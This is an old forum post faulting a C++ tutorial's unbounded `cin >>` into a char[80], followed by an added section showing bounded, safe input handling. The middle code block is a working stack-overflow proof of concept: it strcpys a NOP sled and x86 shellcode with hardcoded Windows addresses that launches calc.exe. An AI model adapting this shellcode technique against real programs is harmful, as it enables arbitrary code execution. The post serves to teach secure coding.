[ opcode @ 19.07.2006. 12:50 ] @
I've been looking at some C++ tutorials around the net, and in every example I found some bug that can be exploited... here is a trivial example from http://www.cplusplus.com/doc/tutorial/ntcs.html

The first example in that tutorial:

Code:

    // null-terminated sequences of characters
    #include <iostream>
    using namespace std;

    int main ()
    {
      char question[] = "Please, enter your first name: ";
      char greeting[] = "Hello, ";
      char yourname [80];
      cout << question;
      cin >> yourname;
      cout << greeting << yourname << "!";
      return 0;
    }

Of course the vulnerable part can be seen from a mile away... and that is cin >> yourname;, and here is how it would look in Dev-C++:

Code:

    #include <iostream>
    #include <cstring>   // strcpy
    #include <cstdlib>   // system
    using namespace std;

    int main ()
    {
      char question[] = "Please, enter your first name: ";
      char greeting[] = "Hello, ";
      char yourname [80];
      cout << question;
      // strcpy stands in for typing the input at the cin prompt;
      // the string is longer than the 80-byte yourname buffer
      strcpy(yourname,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                      "\x90\x90\x89\xE5\xC6\x45\x01\x63\xC6\x45"
                      "\x02\x61\xC6\x45\x03\x6C\xC6\x45\x04\x63"
                      "\x32\xE4\x88\x65\x05\x31\xC0\x40\x50\x8D"
                      "\x45\x01\x50\xB8\x4D\x11\x86\x7C\xFF\xD0"
                      "\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0"
                      "\xF0\xFE\x22");
      cout << greeting << yourname << "!";
      system("PAUSE");
      return 0;
    }

calc.exe gets launched... wow

I used strcpy instead of cin so I wouldn't have to type that in by hand... and I also tried it with cin, and calc.exe pops up as well.

Nothing terrible... it just annoyed me how they teach people to write programs the wrong way.
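
Added example, not part of the original post or of the cplusplus.com tutorial: the same name prompt read with an explicit bound, once into the fixed `char[80]` buffer and once into a `std::string`. The names `ReadResult`, `read_word` and `read_name` are hypothetical, and the 500-character input is constructed for the demonstration.

```cpp
#include <cctype>
#include <cstddef>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

struct ReadResult {
    bool ok;         // a token was extracted
    bool truncated;  // the typed token was longer than the buffer
};

// Bounded replacement for `cin >> yourname` on a fixed-size char array.
// std::setw(N) limits operator>> to N-1 characters plus the terminating '\0'.
template <std::size_t N>
ReadResult read_word(std::istream& in, char (&buf)[N]) {
    buf[0] = '\0';
    if (!(in >> std::setw(static_cast<int>(N)) >> buf)) return {false, false};
    bool truncated = false;
    // Anything left before the next whitespace is the part that did not fit;
    // discard it so it is not taken as the answer to the next prompt.
    while (in.good()) {
        int next = in.peek();
        if (next == std::char_traits<char>::eof() || std::isspace(next)) break;
        truncated = true;
        in.get();
    }
    return {true, truncated};
}

// Preferred form: std::string grows with the input; the length limit is
// an explicit policy check instead of a property of the stack layout.
bool read_name(std::istream& in, std::string& name, std::size_t max_len = 79) {
    if (!(in >> name)) return false;
    if (name.size() > max_len) { name.clear(); return false; }
    return true;
}

int main() {
    // Constructed input: a 500-character "name" followed by a normal one.
    std::istringstream input(std::string(500, 'A') + "\nAna\n");
    char yourname[80];
    ReadResult r = read_word(input, yourname);
    std::cout << "stored " << std::string(yourname).size()
              << " chars, truncated=" << r.truncated << "\n";
    std::string name;
    if (read_name(input, name)) std::cout << "Hello, " << name << "!\n";
    return 0;
}
```

Since C++20, `operator>>` accepts only a char array of known size and bounds the read itself; on earlier standards the `std::setw` call is what supplies the bound.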